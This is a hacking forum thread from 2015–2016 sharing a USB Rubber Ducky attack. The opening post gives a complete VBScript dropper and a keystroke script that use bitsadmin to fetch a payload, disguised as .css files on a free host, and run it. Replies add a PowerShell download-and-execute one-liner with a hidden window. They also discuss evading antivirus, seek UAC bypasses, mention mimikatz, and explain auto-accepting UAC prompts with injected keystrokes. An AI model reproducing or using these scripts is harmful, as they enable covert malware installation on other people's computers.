Hashirama Posted November 22, 2015 Share Posted November 22, 2015 So, this script downloads VB script via cmd and witch downloads payload.exe. To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css. WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work! VB script: SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe" Function SaveWebBinary(strUrl, strFile) 'As Boolean Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Const ForWriting = 2 Dim web, varByteArray, strData, strBuffer, lngCounter, ado On Error Resume Next 'Download the file with any available object Err.Clear Set web = Nothing Set web = CreateObject("WinHttp.WinHttpRequest.5.1") If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest") If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP") If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP") web.Open "GET", strURL, False web.Send If Err.Number <> 0 Then SaveWebBinary = False Set web = Nothing Exit Function End If If web.Status <> "200" Then SaveWebBinary = False Set web = Nothing Exit Function End If varByteArray = web.ResponseBody Set web = Nothing 'Now save the file with any available method On Error Resume Next Set ado = Nothing Set ado = CreateObject("ADODB.Stream") If ado Is Nothing Then Set fs = CreateObject("Scripting.FileSystemObject") Set ts = fs.OpenTextFile(strFile, ForWriting, True) strData = "" strBuffer = "" For lngCounter = 0 to UBound(varByteArray) ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) Next ts.Close Else ado.Type = adTypeBinary ado.Open ado.Write varByteArray ado.SaveToFile strFile, adSaveCreateOverWrite ado.Close End If SaveWebBinary = True End Function wscript.sleep 5000 CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe" Ducky script: GUI r DELAY 200 STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs ENTER Happy hacking! Quote Link to comment Share on other sites More sharing options...
FlashOut Posted February 18, 2016 Share Posted February 18, 2016 hey seems to be nice but the vb script get detected by my AV software :( Quote Link to comment Share on other sites More sharing options...
White Light Posted February 18, 2016 Share Posted February 18, 2016 Why download and use the VB script to download the end file when you can just download and execute the file directly? Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 18, 2016 Author Share Posted February 18, 2016 hey seems to be nice but the vb script get detected by my AV software :( What AV are you using? Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 18, 2016 Author Share Posted February 18, 2016 Why download and use the VB script to download the end file when you can just download and execute the file directly? Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash. Quote Link to comment Share on other sites More sharing options...
White Light Posted February 19, 2016 Share Posted February 19, 2016 Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash. You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle. (New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe' Quote Link to comment Share on other sites More sharing options...
FlashOut Posted February 19, 2016 Share Posted February 19, 2016 i use panda free antivirus is there any other vb script whice do the same but dont get detected? it also usefull because you can change the download file on your webspace and you dont need to change the rubby usb inject.bin :D Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 20, 2016 Author Share Posted February 20, 2016 You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle. (New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe' I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work. Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 20, 2016 Author Share Posted February 20, 2016 i use panda free antivirus is there any other vb script whice do the same but dont get detected? it also usefull because you can change the download file on your webspace and you dont need to change the rubby usb inject.bin :D I scanned vb script on virus total, and didn't get any detections. Quote Link to comment Share on other sites More sharing options...
FlashOut Posted February 20, 2016 Share Posted February 20, 2016 https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/ lol my av detects it panda :) i thought its a bad av scanner but on most av its clean so its useabel xD Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 20, 2016 Author Share Posted February 20, 2016 https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/ lol my av detects it panda :) i thought its a bad av scanner but on most av its clean so its useabel xD Damn, AVs are updated too fast. LoL Anyway, simple google search will get you a lot of vb scripts for downloading a file. Quote Link to comment Share on other sites More sharing options...
White Light Posted February 20, 2016 Share Posted February 20, 2016 I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work. I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions. Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 21, 2016 Author Share Posted February 21, 2016 I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versAre you Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful. Quote Link to comment Share on other sites More sharing options...
White Light Posted February 22, 2016 Share Posted February 22, 2016 Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful. I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt. That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it. Quote Link to comment Share on other sites More sharing options...
Hashirama Posted February 22, 2016 Author Share Posted February 22, 2016 I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt. That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it. I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow. Quote Link to comment Share on other sites More sharing options...
White Light Posted February 22, 2016 Share Posted February 22, 2016 I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow. The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.